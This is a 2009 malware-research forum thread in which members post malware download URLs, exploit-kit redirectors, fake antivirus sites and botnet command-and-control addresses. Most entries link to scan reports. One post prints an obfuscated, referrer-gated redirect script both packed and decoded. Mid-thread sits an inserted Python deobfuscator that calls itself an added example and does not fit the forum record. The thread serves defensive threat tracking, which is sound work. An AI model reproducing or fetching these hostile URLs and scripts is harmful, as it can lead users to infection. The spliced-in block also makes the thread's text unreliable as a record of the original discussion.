http://ijpabevvif.com/ld/gnh_5/gnh5.exe
http://ijpabevvif.com/ld/gnh_7/gnh7.exe
http://ijpabevvif.com/ld/gnh_8/gnh8.exe
http://ijpabevvif.com/ld/gnh_9/gnh9.exe
http://ijpabevvif.com/ld/grg/grg.exe

Misc

Code: [Select]
http://www.dofulfill.info/Packer.dll
http://www.dofulfill.info/TRSOCR.dat
http://www.dofulfill.info/TRSOCR.ini
http://www.dofulfill.info/TRSOCR.dll
http://www.dofulfill.info/AdvOcr.dll
http://www.casadosrelojoeiros.com.br/Imagens/lo.jpg
http://www.onlyfreegames.net/screen41.jpg
http://www.onlyfreegames.net/screen42.jpg
http://61.19.252.95/apaches.gif
http://61.19.252.95/apachew.gif
http://866muma.3322.org/csru.exe
http://866muma.3322.org/csrb.exe
http://866muma.3322.org/csrx.exe
http://866muma.3322.org/csrp.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/kill.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/1.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/2.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/3.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/4.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/5.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/6.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/7.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/8.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/9.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/10.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/11.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/12.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/13.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/14.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/15.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/16.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/17.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/18.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/19.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/20.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/21.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/22.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/23.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/24.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/25.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/26.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/27.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/28.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/29.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/30.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/31.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/32.exe
http://61.147.120.58/fuckq1q1q1q1q1q1q1q1/33.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/b.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/c.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/d.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/e.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/f.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/g.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/h.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/45.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/46.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/47.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/48.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/49.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/a.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/51.dll
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/i.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/j.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/k.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/cap.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/m.exe
http://122.224.48.228/fuckq1q1q1q1q1q1q1q1/hun.dll
http://down.aqbo.cn/soft/tool/%E5%AE%A2%E6%88%B7%E7%AB%AF%E4%B8%8B%E8%BD%BD13354.exe
http://f1.hf3y5.com/1/AcX.exe
http://f1.hf3y5.com/9/AcX.exe
http://d1.hf3y5.com/1/AcX.exe
http://h1.dgfg4.com/01/AeX.exe

Title: Re: daily something......
Post by: CkreM on May 12, 2009, 08:57:51 am
Mebroot
Code: [Select]
http://ijpabevvif.com/ld/gnh_2/gnh2.exe
http://ijpabevvif.com/ld/gnh_3/gnh3.exe
http://ijpabevvif.com/ld/gnh_4/gnh4.exe
http://ijpabevvif.com/ld/gnh_5/gnh5.exe
http://ijpabevvif.com/ld/gnh_7/gnh7.exe
http://ijpabevvif.com/ld/gnh_8/gnh8.exe
http://ijpabevvif.com/ld/gnh_9/gnh9.exe
http://ijpabevvif.com/ld/grg/grg.exe

hamm, they changed their way of infection again?
Title: Re: daily something......
Post by: sursmurf on May 12, 2009, 10:47:20 am
Code: [Select]
hXXp://hugetopnano.cn:8080/index.php
downloads

flash.swf
http://www.virustotal.com/analisis/6a7c462458c96cc099cfb7e340e15562

readme.pdf
http://www.virustotal.com/analisis/cfc979bd7744a91c5f444c8f4c0375e2

Title: Re: daily something......
Post by: CkreM on May 12, 2009, 02:34:13 pm
KoobFace:
Code: [Select]
71.202.219.18/setup.exe
208.97.2.97/setup.exe
Trojan:
Code: [Select]
yourelitehosting.ru/taskmgr.exe
http://www.virustotal.com/analisis/4b38b6888024000227a834d65b612365
Trojan:
Code: [Select]
5file.ru/vkphoto.exe http://www.virustotal.com/analisis/b4c968b1eb1f4fa95fa9eca46b09adeb
Trojan:
Code: [Select]
bureau.co.il/web/system.exe
http://www.virustotal.com/analisis/31e365b7f7c555b50d752a9eb118ce1a

Fake AV:
Code: [Select]
adware-help.com/promo/anti-virus-1.php?uid=70e191e0aaeac213213a62e4c05c9977
the downloaded file:
Code: [Select]
installz.cn/stubfiles/70e19.exe
http://www.virustotal.com/analisis/b18edcbad2b207e305d789afb32cd4e6
Title: Re: daily something......
Post by: CM_MWR on May 12, 2009, 11:28:56 pm
Quote
hamm, they changed their way of infection again?

Is strange yes, not sure what to make of it, see the iframes launch but nothing happens, then I can fetch the binary locally using a direct link.

Maybe they know who I am by now.  :'(
Title: Re: daily something......
Post by: CkreM on May 13, 2009, 03:04:42 am
redirects to rogue:
Code: [Select]
gorankscan.com
Fake AV:
Code: [Select]
scanlux4.info
pornproductions09.com/scan/?id=268
and the d/l file:
pornproductions09.net/codec.exe
http://www.virustotal.com/analisis/51f9f528c0444f84faa229177660ed09

Mebroot:
Code: [Select]
hiyuxngvif.com/cgi-bin/index.cgi?dx
http://wepawet.cs.ucsb.edu/view.php?hash=8cadb9cae57538f219069c6cb2d44555&t=1242183318&type=js
Title: Re: daily something......
Post by: michajp on May 13, 2009, 03:53:15 pm
While checking some old LuckySploit URL, the following popped up instead:

Code: [Select]
hxxp://addobeflashplayer.net/update/?promoid=FbU9dTs
hxxp://addobeflashplayer.net/update/?promoid=Ve8Tnv4

With installer at:
Code: [Select]
hxxp://addobeflashplayer.net/get/flashplayer/current/install_flash_player.exe
http://www.virustotal.com/analisis/3185d068ff2871765328dcdc86d7affc
Title: Re: daily something......
Post by: CkreM on May 14, 2009, 05:55:07 am
Koobface:
Code: [Select]
75.137.70.87/setup.exe
174.0.8.174/setup.exe
http://www.virustotal.com/analisis/06202d4e1ceb674f95435d05bcc6149f

Exploit/trojan:
Code: [Select]
luks5.cn/index.php
http://wepawet.iseclab.org/view.php?hash=c7a0e50c37e35c290324455c17b4b27e&t=1241763932&type=js

Exploit/trojan (Wepawet gives invalid hostname)
Code: [Select]
usacaaugb.cn/life/index.php
PDF analysis: http://wepawet.iseclab.org/view.php?hash=711a0cc4d481aa078c161179779310f1&type=js
Title: Re: daily something......
Post by: SysAdMini on May 14, 2009, 10:19:45 am
exploits
Code: [Select]
rogkadej.cn/nuc/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=76a617d6921697f36d5d08f5fe163908&t=1242296838&type=js

trojan
Code: [Select]
rogkadej.cn/nuc/exe.php
http://www.virustotal.com/analisis/be735f15770e8e06ebac50ec1bfafd40 7/40
Title: Re: daily something......
Post by: SysAdMini on May 14, 2009, 11:54:38 am
redirect to exploits
Code: [Select]
bigbestfind.cn:8080/ts/in.cgi?pepsi4
hugepremium.cn:8080/ts/in.cgi?pepsi5
thebestyoucanfind.cn:8080/ts/in.cgi?pepsi3
http://wepawet.cs.ucsb.edu/view.php?hash=e95003549c9b2d9c5cc9388f2056d9bc&t=1242302241&type=js
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=53ddc7d15d0b2c2083c09c15aff3593a&t=1242284850
http://wepawet.iseclab.org/view.php?hash=8e897a5695627f956885238acabfff04&t=1242296961&type=js

exploit
Code: [Select]
bigtopcabaret.cn:8080/index.php
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=53ddc7d15d0b2c2083c09c15aff3593a&t=1242284850

redirects to the already known autobestwestern.cn
formerly hosted at Zlkon and Eurohost LLC
Code: [Select]
autobestwestern.cn:8080/load.php?id=8
http://www.virustotal.com/analisis/77e676047adcaeeb5b32187f346de431 9/41
Title: Re: daily something......
Post by: sparsha on May 14, 2009, 07:20:35 pm
Code: [Select]
http://internetsecuritymetrics.com/hitin.php?land=30&affid=01986
http://videoporntrue.net/pcdef.exe
Title: Re: daily something......
Post by: SysAdMini on May 14, 2009, 09:48:12 pm
Code: [Select]
www.loshaqe.com/sb.exe
http://www.virustotal.com/analisis/75e4162cf4b32e95418e9c9cb087f647 5/40
http://www.threatexpert.com/report.aspx?md5=3f451779cfd0dc44f54b8b10b658749f

Code: [Select]
www.loshaqe.com/ret.exe
http://www.virustotal.com/analisis/bea1ceb55fc01d3abc1c206f7aae4a31 14/39

downloader for DarkGT/IframeDollar
Code: [Select]
www.loshaqe.com/ins.exe
http://www.virustotal.com/analisis/26120869a3d862b46bf64e769f0fc32b 25/40

Code: [Select]
www.loshaqe.com/eg.exe
http://www.virustotal.com/analisis/a05691e95c2b074300ca8e075a69853b 11/40

Title: Re: daily something......
Post by: CkreM on May 15, 2009, 03:16:58 am
Koobface:
Code: [Select]
71.8.59.249/setup.exe
Trojan:
Code: [Select]
vexpen.jino.ru/file/bot.exe
http://www.virustotal.com/analisis/60c864a624b006b5c3a1e9875ae99c4a

Fake AV:
Code: [Select]
antvirushelpv1.com
(download link ain't working atm but will work soon I guess..)

Code: [Select]
securityhelpcenter.com/1/
(currently only have a link to the fake payment site at:
Code: [Select]
live-payment-system.com/buy.php?nh=1&id=
Title: Re: daily something......
Post by: MysteryFCM on May 15, 2009, 03:29:06 am
http://antvirushelpv1.com/download.php?id=2004

;)

Downloads: Install_2004.exe (132K)

Actually just came across it whilst researching a malicious URL in the Google results that redirected me to it;

qualitycollisionbodyshop.com/gkxtd/zunet/cadets.htm

You've got to load it with a Google referer string though, or it'll redir you to nothingsville courtesy of;

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://qualitycollisionbodyshop.com/gkxtd/zunet/2.js
Server IP: 76.162.102.189 [ rev.opentransfer.com.189.102.162.76.in-addr.arpa ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 15 May 2009
Time: 04:22:43:22
*****************************************************************

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,102,40,41,123,13,10,118,97,114,32,114,61,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,44,116,61,34,34,44,113,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,103,111,111,103,108,101,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,115,110,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,121,97,104,111,111,46,34,41,33,61,45,49,41,116,61,34,112,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,108,116,97,118,105,115,116,97,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,111,108,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,97,115,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,99,111,109,99,97,115,116,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,98,101,108,108,115,111,117,116,104,46,34,41,33,61,45,49,41,116,61,34,115,116,114,105,110,103,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,110,101,116,115,99,97,112,101,46,34,41,33,61,45,49,41,116,61,34,113,117,101,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,109,121,119,101,98,115,101,97,114,99,104,46,34,41,33,61,45,49,41,116,61,34,115,101,97,114,99,104,102,111,114,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,112,101,111,112,108,101,112,99,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,115,116,97,114,119,97,114,101,46,34,41,33,61,45,49,41,116,61,34,113,114,121,34,59,32,13,10,105,102,40,114,46,105,110,100,101,120,79,102,40,34,101,97,114,116,104,108,105,110,107,46,34,41,33,61,45,49,41,116,61,34,113,34,59,32,13,10,105,102,40,116,46,108,101,110,103,116,104,38,38,40,40,113,61,114,46,105,110,100,101,120,79,102,40,34,63,34,43,116,43,34,61,34,41,41,33,61,45,49,124,124,40,113,61,114,46,105,110,100,101,120,79,102,40,34,38,34,43,116,43,34,61,34,41,41,33,61,45,49,41,41,32,13,10,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,32,61,32,40,34,104,116,116,112,58,47,47,111,112,101,110,115,116,97,114,49,46,110,101,116,47,105,110,46,99,103,105,63,57,38,115,101,111,114,101,102,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,114,101,102,101,114,114,101,114,41,43,34,38,112,97,114,97,109,101,116,101,114,61,36,107,101,121,119,111,114,100,38,115,101,61,36,115,101,38,117,114,61,49,38,72,84,84,80,95,82,69,70,69,82,69,82,61,34,43,101,110,99,111,100,101,85,82,73,67,111,109,112,111,110,101,110,116,40,100,111,99,117,109,101,110,116,46,85,82,76,41,43,34,38,100,101,102,97,117,108,116,95,107,101,121,119,111,114,100,61,100,101,102,97,117,108,116,34,41,59,32,13,10,125,13,10,13,10,119,105,110,100,111,119,46,111,110,70,111,99,117,115,32,61,32,102,40,41));

Which decodes to;

Code: [Select]
function f(){
var r=document.referrer,t="",q;
if(r.indexOf("google.")!=-1)t="q";
if(r.indexOf("msn.")!=-1)t="q";
if(r.indexOf("yahoo.")!=-1)t="p";
if(r.indexOf("altavista.")!=-1)t="q";
if(r.indexOf("aol.")!=-1)t="query";
if(r.indexOf("ask.")!=-1)t="q";
if(r.indexOf("comcast.")!=-1)t="q";
if(r.indexOf("bellsouth.")!=-1)t="string";
if(r.indexOf("netscape.")!=-1)t="query";
if(r.indexOf("mywebsearch.")!=-1)t="searchfor";
if(r.indexOf("peoplepc.")!=-1)t="q";
if(r.indexOf("starware.")!=-1)t="qry";
if(r.indexOf("earthlink.")!=-1)t="q";
if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))
window.location = ("http://openstar1.net/in.cgi?9&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default");
}

window.onFocus = f()

/edit

http://www.virustotal.com/analisis/d3008ef63c7db98bc3da9b63a3e567d2
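A small analyst-side decoder for the eval(String.fromCharCode(...)) packing shown above, plus a summary of the referrer gate it hides (which search-engine markers are tested, which query parameter each maps to, and the redirect target), with an emulator for the gate so you can see why a fetch without a search-engine referer stays silent. This is an added example for the thread, not code from the post or from vURL; the packed input is constructed here from a short plaintext modelled on the decoded script, and the host redirector.invalid is a placeholder.

```python
"""Deobfuscate eval(String.fromCharCode(...)) and summarise a referrer gate.

Added example for this thread; not code from the original post or from vURL.
The packed script below is constructed from a short plaintext modelled on the
decoded one in the thread, and "redirector.invalid" is a placeholder host.
"""
import re

# The packer pattern quoted in the post: eval(String.fromCharCode(n,n,n,...))
FROMCHARCODE_RE = re.compile(
    r"eval\(\s*String\.fromCharCode\(\s*([\d\s,]+?)\s*\)\s*\)", re.IGNORECASE
)
# if(r.indexOf("google.")!=-1)t="q";   ->  ("google.", "q")
CHECK_RE = re.compile(r'indexOf\("([^"]+)"\)\s*!=\s*-1\)\s*t\s*=\s*"([^"]*)"')
# window.location = ("http://host/in.cgi?9&seoref="+...   ->  literal prefix
TARGET_RE = re.compile(
    r'(?:window|document)\.location(?:\.href)?\s*=\s*\(?\s*"([^"]+)"'
)


def decode_fromcharcode(script: str) -> list[str]:
    """Return the decoded text of every eval(String.fromCharCode(...)) in `script`."""
    decoded = []
    for m in FROMCHARCODE_RE.finditer(script):
        codes = [int(n) for n in re.findall(r"\d+", m.group(1))]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def extract_referrer_gate(js: str) -> dict:
    """Summarise a referrer-gated redirect in decoded JS.

    Returns {"checks": [(marker, param), ...], "target": url_prefix} when the
    script tests document.referrer against substrings and assigns location;
    otherwise an empty dict.
    """
    checks = CHECK_RE.findall(js)
    target = TARGET_RE.search(js)
    if "document.referrer" not in js or not checks or not target:
        return {}
    return {"checks": checks, "target": target.group(1)}


def gate_fires(referrer: str, gate: dict) -> bool:
    """Emulate the gate: would this referrer trigger the redirect?

    Mirrors the decoded logic: successive ifs, so the last matching marker
    wins, and the referrer must also carry that engine's query parameter
    ("?q=" or "&q=" for google.).  A direct fetch with no referer never fires.
    """
    param = ""
    for marker, name in gate.get("checks", []):
        if marker in referrer:
            param = name
    return bool(param) and (f"?{param}=" in referrer or f"&{param}=" in referrer)


def analyse(page_source: str) -> list[dict]:
    """Decode every packed eval() in a captured page and report referrer gates."""
    findings = []
    for js in decode_fromcharcode(page_source):
        gate = extract_referrer_gate(js)
        if gate:
            findings.append(gate)
    return findings


# --- constructed sample input (not the thread's blob) -------------------------
PLAIN_JS = (
    'function f(){\r\n'
    'var r=document.referrer,t="",q;\r\n'
    'if(r.indexOf("google.")!=-1)t="q";\r\n'
    'if(r.indexOf("yahoo.")!=-1)t="p";\r\n'
    'if(r.indexOf("aol.")!=-1)t="query";\r\n'
    'if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1))\r\n'
    'window.location = ("http://redirector.invalid/in.cgi?9&seoref="'
    '+encodeURIComponent(document.referrer));\r\n'
    '}\r\n\r\nwindow.onFocus = f()'
)


def pack(js: str) -> str:
    """Pack plaintext JS the way the quoted sample was packed (test-input helper)."""
    return "eval(String.fromCharCode(" + ",".join(str(ord(c)) for c in js) + "));"


SAMPLE_PAGE = "<html><script>" + pack(PLAIN_JS) + "</script></html>"

if __name__ == "__main__":
    for gate in analyse(SAMPLE_PAGE):
        print("redirect target prefix:", gate["target"])
        for marker, param in gate["checks"]:
            print(f"  referrer containing {marker!r} needs parameter {param}=")
        for ref in ("http://www.google.com/search?q=body+shop", "http://www.google.com/"):
            print(f"  {ref} -> {'fires' if gate_fires(ref, gate) else 'silent'}")
```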
Title: Re: daily something......
Post by: CkreM on May 15, 2009, 04:00:57 am
I actually can download it directly (
Code: [Select]
http://antvirushelpv1.com/download.php?id=2004)
Title: Re: daily something......
Post by: MysteryFCM on May 15, 2009, 04:09:22 am
You can, or can't?

/edit

It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)
Title: Re: daily something......
Post by: CkreM on May 15, 2009, 05:55:27 am
Quote
You can, or can't?

/edit

It was the .js file on the domain that redirs to the rogue domain I had to supply the Google referer to btw, not the rogue domain ;)

 ;D
Title: Re: daily something......
Post by: CkreM on May 18, 2009, 03:37:50 am
Redirects to exploits:
Code: [Select]
popyodiw.cn/s/in.cgi?10
Koobface:
Code: [Select]
123.199.89.28/setup.exe
Trojan:
Code: [Select]
ji-u.cn/506.exe
http://www.virustotal.com/analisis/9c37779c08a666084c8088a42b44bbf6
Trojan:
Code: [Select]
claremontfinance.org/voland.exe
http://www.virustotal.com/analisis/970e0653980bb5313e6f9bbf82b32cc7
Trojan:
Code: [Select]
photo-host.in/new/exe/5555.exe
http://www.virustotal.com/analisis/bc8cb44f6b8046208e130186e4b78098
Trojan:
Code: [Select]
091809.ru/main_.exe
http://www.virustotal.com/analisis/d82a419082bfcf5c716bb6388f3c9ad1
Trojan:
Code: [Select]
buzizoo2.com/15.05-fuck.exe
http://www.virustotal.com/analisis/b42234e7210ce0192855eb43c3121b49
Trojan:
Code: [Select]
213.171.222.30/codec.exe
http://www.virustotal.com/analisis/14e090fe72f0114a4181d7d0d1b5b8fd
Title: Re: daily something......
Post by: SysAdMini on May 18, 2009, 11:51:34 am
exploits
Code: [Select]
numbersbulk.cn/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=ac1e4c06e172e7e6d75c8ac4c7ebb81d&t=1242647454&type=js

trojan
Code: [Select]
numbersbulk.cn/load.php?id=5
http://www.virustotal.com/analisis/1b81c4c3f26c3b88d3721b61b0fe8f14 7/40
Title: Re: daily something......
Post by: CkreM on May 19, 2009, 06:25:21 am
Exploit/trojan:
Code: [Select]
pimpalas.cn/yespdf/index.php
http://wepawet.iseclab.org/view.php?hash=d8776172d856e083138ff2828f1c28ae&t=1242712689&type=js

Redirect to fake AV:
Code: [Select]
gogenscan.com
gozonescan.com
Fake AV:
Code: [Select]
fanscan4.info
miniscan4.info
scanlist6.com
luxscan4.info
Title: Re: daily something......
Post by: SysAdMini on May 19, 2009, 11:50:56 am
Code: [Select]
pearch.net/in.cgi?7
redirects to
Code: [Select]
europpc.com/search.php?iw=1&links=
links redirect to
Code: [Select]
wplstr.net/in.cgi?20
redirects to fake system check
Code: [Select]
systemstabilityscan.com/5
starts download
Code: [Select]
http://adioro.com/download.php?aid=5
redirects to
Code: [Select]
dl1.adioro.com/get.php?track_id=5
downloads
Code: [Select]
dl1.adioro.com/distribs/5/registryoptimizer.exe
http://www.virustotal.com/de/analisis/99110a3a11c3cba50d7725b2453813ec 0/40
MD5...: fcd4b853dcea9d412fab09c66134058a
Title: Re: daily something......
Post by: Malware-Web-Threats on May 19, 2009, 03:52:16 pm
72.47.253.37

redirects to exploits:
Code: [Select]
hxxp://findbigbrother.cn:8080/ts/in.cgi?pepsi6
hxxp://bestwebfind.cn:8080/ts/in.cgi?pepsi11
hxxp://findyourbigwhy.cn:8080/ts/in.cgi?pepsi7
hxxp://findbigboob.cn:8080/ts/in.cgi?pepsi6
Wepawet (http://wepawet.iseclab.org/view.php?hash=ebb1fe9522a585973be68f770635d2dd&t=1242748332&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=1546ed48bdf651718cfd0174a82b6efb&t=1242685229&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=af9e734c0b248533c0f9075629d7f628&t=1242687499&type=js)
The latest has no report (too many submissions to Wepawet for hours)
Title: Re: daily something......
Post by: Malware-Web-Threats on May 19, 2009, 04:11:26 pm
redirects to exploits
91.212.41.119
Code: [Select]
hxxp://silzefos.cn/s/in.cgi?13
Wepawet (http://wepawet.iseclab.org/view.php?hash=ac168dc0c36f802d46ca35394f32d439&t=1242719638&type=js)
Registrant: Meng Qun / janglkd@ yeah.net

exploits / trojan
221.5.74.52
Code: [Select]
hxxp://profit-marketing.net/earningn/t.php
hxxp://profit-marketing.net/earningn/ll.php?b=2&s=snaj
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Co11ab
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=ODAY
hxxp://profit-marketing.net/earningn/ll.php?b=1&s=Ut1l
hxxp://profit-marketing.net/imocs.swf
hxxp://profit-marketing.net/inocs.pdf
Registrant: Michell.Gregory2009@ yahoo.com

Wepawet (http://wepawet.iseclab.org/view.php?hash=c813e5a5f4a61be58a0e14d1d805d78e&t=1242583611&type=js) (exploit)

VirusTotal (http://www.virustotal.com/analisis/664aeb722b7908da6cbd8d75c472feb2) (flash) - 3/39 (7.69%)
Wepawet (http://wepawet.iseclab.org/view.php?hash=349deac830735bacff1d9d14c159498f&type=js) (flash)

VirusTotal (http://www.virustotal.com/analisis/9153dbcad1da90126ef4cb18b2507693) (pdf) - 7/39 (17.95%)
VirusTotal (http://www.virustotal.com/analisis/fdbf2a14b8135705d740bc9ffa931074) (exe) - 3/39 (7.69%)

Anubis (http://anubis.iseclab.org/?action=result&task_id=15a74956aa17d20f49dfd3c701287cc93&call=first)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=aa09ec5696ee8105d36a31d370d3a606)

Botnet C&C:
213.182.197.249
Code: [Select]
hxxp://krottorot.cn/ging/controller.php?action=bot&entity_list=&uid=&first=1&guid=1824245000&rnd=946862
hxxp://krottorot.cn/ging/controller.php?action=report&guid=0&rnd=946862&uid=&entity=1241486361:unique_start
Source: Anubis (http://anubis.iseclab.org/?action=result&task_id=15a74956aa17d20f49dfd3c701287cc93&call=first)
Registrant: Chen / chen.poon1732646@ yahoo.com

Botnet C&C:
78.129.166.5
Code: [Select]
hxxp://ftpshki.cn/admin/controller.php?action=bot&entity_list=&uid=1&first=1&guid=1824245000&rnd=2514213
hxxp://ftpshki.cn/admin/controller.php?action=report&guid=0&rnd=25142137&uid=1&entity=1238216956:unique_start
hxxp://ftpshki.cn/admin/receiver/online
Source: Anubis (http://anubis.iseclab.org/?action=result&task_id=1c8ae7bb70a466f64d5ed8f74df829bfe&format=html)
Registrant: SmithJohn / Chehhost@ admin.ru
Title: Re: daily something......
Post by: Malware-Web-Threats on May 19, 2009, 05:42:36 pm
91.209.163.201 - vl01.c76.fvtn.net
Code: [Select]
hxxp://download.official-emule.com/Live-Player_setup.php
hxxp://download.original-solitaire.com/Live-Player_setup.php

91.209.163.202 - vl02.c76.fvtn.net
Code: [Select]
hxxp://download.go-turf.com/Live-Player_setup.php
hxxp://download.gomusic.com/Live-Player_setup.php
hxxp://download.littlesmileys.com/Live-Player_setup.php
hxxp://download.official-bittorrent.com/Live-Player_setup.php
hxxp://download.schnellsucher.com/Live-Player_setup.php
hxxp://download.search-solver.com/Live-Player_setup.php
hxxp://download.smilymail.com/Live-Player_setup.php
hxxp://download.trovarapido.com/Live-Player_setup.php
hxxp://download.web-mediaplayer.com/Live-Player_setup.php

91.209.163.203 - vl03.c76.fvtn.net
Code: [Select]
hxxp://download.backstripgirls.com/Live-Player_setup.php
hxxp://download.buscalisto.com/Live-Player_setup.php
hxxp://download.games-attack.com/Live-Player_setup.php
hxxp://download.go-astro.com/Live-Player_setup.php
hxxp://download.gomusic.net/Live-Player_setup.php
hxxp://download.hot-tv.com/Live-Player_setup.php
hxxp://download.speed-downloading.com/Live-Player_setup.php

same file:
Quote
File size: 233000 bytes
MD5: 67a6bfee47f1e6c7d1c03d8c02df6b95
VirusTotal (http://www.virustotal.com/analisis/d01ac3e0cd1e08afc94cf0f79bd34489) - 12/40 (30%)

Registrant: Ramon Viladomiu / 2ffba9ee4ff19e8587163b873c03ff22-913471@ contact.gandi.net

related to: http://www.siteadvisor.com/sites/live-player.com (http://www.siteadvisor.com/sites/live-player.com)
Title: Re: daily something......
Post by: SysAdMini on May 19, 2009, 07:28:26 pm
Code: [Select]
filesstoragesarchive.com/softwarefortubeview.42002.exe
http://www.virustotal.com/analisis/e28f31c90582938ebfb7674f6136ad80 3/40
http://www.threatexpert.com/report.aspx?md5=f15dd0112f6f77dbce18d349dd65af79
Title: Re: daily something......
Post by: CkreM on May 20, 2009, 05:22:23 am
Emold:
Code: [Select]
ku98.biz/ghost/dia.exe
http://www.virustotal.com/analisis/6e833596122310890ab85283b612aa02
Trojan:
Code: [Select]
rezident77.ru/files/cry.exe
http://www.virustotal.com/analisis/860b0c60fcc25b00b58075cff3492cd8
Koobface:
Code: [Select]
121.13.55.49/setup.exe
79.181.99.78/setup.exe
Title: Re: daily something......
Post by: CkreM on May 21, 2009, 06:20:21 am
Trojan:
Code: [Select]
samog0n.info/analyse/3xNt0f6b9e3R.exe
http://www.virustotal.com/analisis/3f6196088309178a7ced521f2ac381c0
Trojan:
Code: [Select]
tamporn.net/indir.exe http://www.virustotal.com/analisis/33ac4a6f5025b70f407812c3637cb084
Trojan
Code: [Select]
yourelitehosting.ru/explorer.exe
